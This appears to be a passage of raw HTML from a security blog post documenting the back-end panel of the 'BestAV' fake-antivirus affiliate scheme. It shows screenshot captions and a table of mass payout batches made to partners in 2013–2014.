&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgddZakrcdxMNvN_PKEjax22mDHHc2zgoIwnwsIfxgwoFfDmtR3UoDnzPEC6mOaMPDWsG55bH0_8lHRFV2X8zqIulLd2P8-6I60YfX_srrV0UBXVQbJQ4jN3gwrrhUhrYBLsrVgm7bBlzg/s1600/BestAV_users_6.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;242&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgddZakrcdxMNvN_PKEjax22mDHHc2zgoIwnwsIfxgwoFfDmtR3UoDnzPEC6mOaMPDWsG55bH0_8lHRFV2X8zqIulLd2P8-6I60YfX_srrV0UBXVQbJQ4jN3gwrrhUhrYBLsrVgm7bBlzg/s1600/BestAV_users_6.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3X2K3C1nrDGAIfaUTMvGLr0iC0PFcWcmHH1km9Oy2xaHeJnaIt8bZ76tb3E8sJjANtFwQfACEEWnL5zK5wLh2YHkmITPjR1QNtWHutihjFfQ8aqoaBKVopP8AIEDBe8__gSdDFJNw6Gk/s1600/BestAV_users_7.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;242&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3X2K3C1nrDGAIfaUTMvGLr0iC0PFcWcmHH1km9Oy2xaHeJnaIt8bZ76tb3E8sJjANtFwQfACEEWnL5zK5wLh2YHkmITPjR1QNtWHutihjFfQ8aqoaBKVopP8AIEDBe8__gSdDFJNw6Gk/s1600/BestAV_users_7.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgq4pK2oUAba3SxbWT89V1oZIv1VzL0LY3tD3OMK9X1zdLWRZHspupvWmGGf9qYpFw_3wVc19j3Rf26dN0R74tKCgLF3rhri8pJmFJo2HN-1sUEt3a_7u1oRBFM45XJDFzchWS4R0unPF8/s1600/BestAV_users_8.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;242&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgq4pK2oUAba3SxbWT89V1oZIv1VzL0LY3tD3OMK9X1zdLWRZHspupvWmGGf9qYpFw_3wVc19j3Rf26dN0R74tKCgLF3rhri8pJmFJo2HN-1sUEt3a_7u1oRBFM45XJDFzchWS4R0unPF8/s1600/BestAV_users_8.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGDjtKEkqmkkveWZFuY2jdK7qRDfmCUTguNvR0EEHKOSifUvy1YNgEsGZyZdjPmfuaukzPYKIkcTa4T9Gp-onsy5ykIrmf7vDKYioiX8ZyD11MliTBYdCDYBQgOW3cFHAmDriGQUrt2LY/s1600/BestAV_users_9.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;200&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGDjtKEkqmkkveWZFuY2jdK7qRDfmCUTguNvR0EEHKOSifUvy1YNgEsGZyZdjPmfuaukzPYKIkcTa4T9Gp-onsy5ykIrmf7vDKYioiX8ZyD11MliTBYdCDYBQgOW3cFHAmDriGQUrt2LY/s1600/BestAV_users_9.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&#39;Support&#39; account:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN-wlVHXoPwKi7Vmjha17mKPJ7bPbFfCki5tJ0nfJoOmU4cCdHqqwznuIPLVJOSYaBZdraxAMJ4s28KQCviIevNn0u67WYKh0WIcC8aewJfK_n9fPXE5Wan69n974knbNCvFGc70XIc28/s1600/10-04-2014+15-08-40.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;315&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN-wlVHXoPwKi7Vmjha17mKPJ7bPbFfCki5tJ0nfJoOmU4cCdHqqwznuIPLVJOSYaBZdraxAMJ4s28KQCviIevNn0u67WYKh0WIcC8aewJfK_n9fPXE5Wan69n974knbNCvFGc70XIc28/s1600/10-04-2014+15-08-40.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Action log, detail for the partner &#39;Severa&#39;:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnnDTjp9_Ap6XVlUUF1LYYdu1K-OIar1xvZlw9XsQfQ9u8HK1wRKJYnCtz7UNB95nh0fFQ-CD3-13wOfnL9filQ-BC8DcGUlB7f1CYhXyJ3DQozxqTeqdZ1pHaYfCjizj8OfTyb57Ao94/s1600/09-04-2014+13-55-00.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;297&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnnDTjp9_Ap6XVlUUF1LYYdu1K-OIar1xvZlw9XsQfQ9u8HK1wRKJYnCtz7UNB95nh0fFQ-CD3-13wOfnL9filQ-BC8DcGUlB7f1CYhXyJ3DQozxqTeqdZ1pHaYfCjizj8OfTyb57Ao94/s1600/09-04-2014+13-55-00.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&amp;nbsp;Payements detail for the partner &#39;Severa&#39;:&lt;br /&gt;
&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2kNpS5CiOeWOBxiy8LYxCjXCIneoDME0_Sjdnw1OlGVlob8JZmXl2rDJ7m9DnI-RaqgEdGg1PT3f_VK12Dxn8nl2cyfs_4F1TpXZuJu8DpEQve4fToZHOWXQG0RWhMEf2oVO4ewnUOMA/s1600/09-04-2014+13-56-18.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;349&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2kNpS5CiOeWOBxiy8LYxCjXCIneoDME0_Sjdnw1OlGVlob8JZmXl2rDJ7m9DnI-RaqgEdGg1PT3f_VK12Dxn8nl2cyfs_4F1TpXZuJu8DpEQve4fToZHOWXQG0RWhMEf2oVO4ewnUOMA/w400-h349/09-04-2014+13-56-18.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
13077.52 $&lt;br /&gt;
&lt;br /&gt;
Edit user infos for the partner &#39;Severa&#39;:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5XMsO5C4Ik_2kKJpx6sAWd2XzEinKJDqZvZD2T6Izex4NPJw9NPkc0MA1mA_5girwdlTQgd1WpTV03cZhDVbK4jr3o3PsPl58M9cg5RO75P_4AN4822DWHs9EXM_wX7_216g5c7YsGbs/s1600/09-04-2014+13-59-16.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;296&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5XMsO5C4Ik_2kKJpx6sAWd2XzEinKJDqZvZD2T6Izex4NPJw9NPkc0MA1mA_5girwdlTQgd1WpTV03cZhDVbK4jr3o3PsPl58M9cg5RO75P_4AN4822DWHs9EXM_wX7_216g5c7YsGbs/s1600/09-04-2014+13-59-16.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;FakeAV to distribute:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2j4w8Wi7X6S2RMcwLd9exQglFNs0bX44O2pJPHypwAqpYnlKig2XUBJuwH1s-f0E3dmTcguTKmmGCQjtdJJc05dShi_m1B8tETMT-Or37a5xJh5BaeBCvxtePecLiXjauQsYRl3LXhlU/s1600/09-04-2014+14-01-48.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2j4w8Wi7X6S2RMcwLd9exQglFNs0bX44O2pJPHypwAqpYnlKig2XUBJuwH1s-f0E3dmTcguTKmmGCQjtdJJc05dShi_m1B8tETMT-Or37a5xJh5BaeBCvxtePecLiXjauQsYRl3LXhlU/s1600/09-04-2014+14-01-48.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Role of Severa inside BestAV:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8Kmuo2bIEoQyTDmVo0qK5P0903-5chw7OC3gRVJX8Jtv7iMS-SD1Yuq5jOvY_5qZhin054XL7-o51FDGgHqMKB6tjy_DD7retQpyI02XGsHAA7KpoRy86vRnX1OjoTPyfkvSEXFpU9o4/s1600/09-04-2014+14-03-47.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8Kmuo2bIEoQyTDmVo0qK5P0903-5chw7OC3gRVJX8Jtv7iMS-SD1Yuq5jOvY_5qZhin054XL7-o51FDGgHqMKB6tjy_DD7retQpyI02XGsHAA7KpoRy86vRnX1OjoTPyfkvSEXFpU9o4/s1600/09-04-2014+14-03-47.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Tickets made by Severa (none):&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgE4a5x8qghhIn1wivfNmbH-SW2j53kitcjQX635kUQa-W8PtBdTGXsLURKV8E_X6OTo-eYYlU-IyfX75gbLvoets9sBWqfrgVeYnUugDQPxrcOxzURZL5sYQIetXAws2_Xy2ny_idSmPw/s1600/09-04-2014+14-00-37.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;193&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgE4a5x8qghhIn1wivfNmbH-SW2j53kitcjQX635kUQa-W8PtBdTGXsLURKV8E_X6OTo-eYYlU-IyfX75gbLvoets9sBWqfrgVeYnUugDQPxrcOxzURZL5sYQIetXAws2_Xy2ny_idSmPw/s1600/09-04-2014+14-00-37.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Mass payements:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbEUp8n8Lc3KZqcivtVfyhqtnTgcIv8h4Xjok6wLQhL0-6sZJY3pEjrJPiseQg2WQVXd8p2VnVB1_SGjP61NJ2u7mpyAV5irug16YPxro9Dh0pytN08_ovd5FdkUvNQiVYii4ZXitQFxs/s1600/09-04-2014+14-05-45.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;286&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbEUp8n8Lc3KZqcivtVfyhqtnTgcIv8h4Xjok6wLQhL0-6sZJY3pEjrJPiseQg2WQVXd8p2VnVB1_SGjP61NJ2u7mpyAV5irug16YPxro9Dh0pytN08_ovd5FdkUvNQiVYii4ZXitQFxs/w400-h286/09-04-2014+14-05-45.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&amp;nbsp;Full list for mass payement:&lt;br /&gt;
&lt;/p&gt;&lt;div class=&quot;text&quot; style=&quot;background-color: #f0f0f0; border: 1px solid rgb(208, 208, 208); color: #000066; font-family: monospace;&quot;&gt;
ID&amp;nbsp;&amp;nbsp;&amp;nbsp; Name&amp;nbsp;&amp;nbsp;&amp;nbsp; List created&amp;nbsp;&amp;nbsp;&amp;nbsp; Date&amp;nbsp;&amp;nbsp;&amp;nbsp; Payed&amp;nbsp;&amp;nbsp;&amp;nbsp; Total money&amp;nbsp;&amp;nbsp;&amp;nbsp; Subject&lt;br /&gt;
136&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2014-03-02&amp;nbsp;&amp;nbsp;&amp;nbsp; 2014-03-02 14:15&amp;nbsp;&amp;nbsp;&amp;nbsp; 2014-03-02&amp;nbsp; 46995.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
135&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-10-07-s2&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-10-07 11:43&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-10-07&amp;nbsp; 12030.36 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
134&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-10-07&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-10-07 11:43&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-10-07&amp;nbsp; 25580.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
133&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-08-29-s1&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-08-29 04:21&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-08-29&amp;nbsp; 25145.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
132&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-08-29&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-08-29 04:20&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-08-29&amp;nbsp; 13492.62 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
131&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-08-24-s2&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-08-24 09:10&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-08-24&amp;nbsp; 41466.03 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
130&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-08-24&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-08-24 09:10&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-08-24&amp;nbsp; 1425.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
129&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-08-06-s2&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-08-06 18:00&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-08-06&amp;nbsp; 22527.60 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
128&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-08-06-s1&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-08-06 18:00&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-08-06&amp;nbsp; 20068.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
126&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-07-30&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-07-30 18:43&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-07-30&amp;nbsp; 7645.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
127&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-07-30-s2&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-07-30 18:43&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-07-30&amp;nbsp; 15429.69 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
125&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-07-24-s2&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-07-24 14:25&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-07-24&amp;nbsp; 2886.27 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
124&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-07-24&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-07-24 14:25&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-07-24&amp;nbsp; 10250.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
123&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-07-22-s2&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-07-22 20:59&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-07-22&amp;nbsp; 23516.16 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
122&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-07-22&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-07-22 20:58&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-07-22&amp;nbsp; 1074.98 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
121&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-07-16-s2&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-07-16 18:53&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-07-16&amp;nbsp; 39988.23 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
120&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-07-16&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-07-16 18:53&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-07-16&amp;nbsp; 4860.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
118&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-07-10-s1&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-07-10 19:19&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-07-10&amp;nbsp; 9980.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
119&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-07-10-s2&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-07-10 19:19&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-07-10&amp;nbsp; 11510.35 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
117&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-07-08-s3&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-07-08 21:44&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-07-08&amp;nbsp; 34.77 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft3&lt;br /&gt;
116&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-07-08-s2&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-07-08 21:44&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-07-08&amp;nbsp; 29119.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
115&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-07-08&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-07-08 21:44&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-07-08&amp;nbsp; 22120.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
114&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-07-01-s2&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-07-01 20:05&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-07-01&amp;nbsp; 38150.70 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
113&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-07-01&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-07-01 20:05&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-07-01&amp;nbsp; 725.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
112&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-06-18-s2&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-06-18 20:04&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-06-18&amp;nbsp; 1463.64 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
111&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-06-18-s1&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-06-18 20:04&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-06-18&amp;nbsp; 16450.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
108&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-06-11&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-06-11 17:50&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-06-11&amp;nbsp; 1935.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
109&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-06-11-s2&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-06-11 17:50&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-06-11&amp;nbsp; 51693.56 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
110&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-06-11-s3&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-06-11 17:51&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-06-11&amp;nbsp; 200.78 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft3&lt;br /&gt;
107&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-06-08-s1&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-06-08 07:25&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-06-08&amp;nbsp; 14940.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
106&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-06-08-s2&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-06-08 07:25&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-06-08&amp;nbsp; 291.55 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
105&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-06-01-s2&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-06-01 21:06&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-06-01&amp;nbsp; 30226.79 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
104&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-06-01&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-06-01 21:06&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-06-01&amp;nbsp; 13170.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
102&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-05-27-s1&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-27 20:50&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-27&amp;nbsp; 905.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
103&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-05-27-s2&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-27 20:50&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-27&amp;nbsp; 31070.58 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
101&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-05-22-s3&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-22 11:08&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-22&amp;nbsp; 36.08 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft3&lt;br /&gt;
100&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-05-22-s2&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-22 11:08&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-22&amp;nbsp; 9115.38 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
99&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-05-22&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-22 11:08&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-22&amp;nbsp; 4600.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
98&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-05-20-s3&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-20 12:01&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-20&amp;nbsp; 4.85 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft3&lt;br /&gt;
97&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-05-20-s2&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-20 12:01&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-20&amp;nbsp; 17522.47 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
96&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-05-20&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-20 12:01&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-20&amp;nbsp; 23605.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
93&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-05-14-s1&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-14 09:31&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-14&amp;nbsp; 8145.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
94&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-05-14-s2&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-14 09:31&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-14&amp;nbsp; 37932.57 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
95&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-05-14-s3&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-14 09:31&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-14&amp;nbsp; 147.23 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft3&lt;br /&gt;
92&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-05-12-s3&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-12 20:10&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-12&amp;nbsp; 45.94 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft3&lt;br /&gt;
91&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-05-12-s2&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-12 20:10&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-12&amp;nbsp; 7742.64 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
90&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-05-12-s1&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-12 20:10&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-12&amp;nbsp; 18495.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
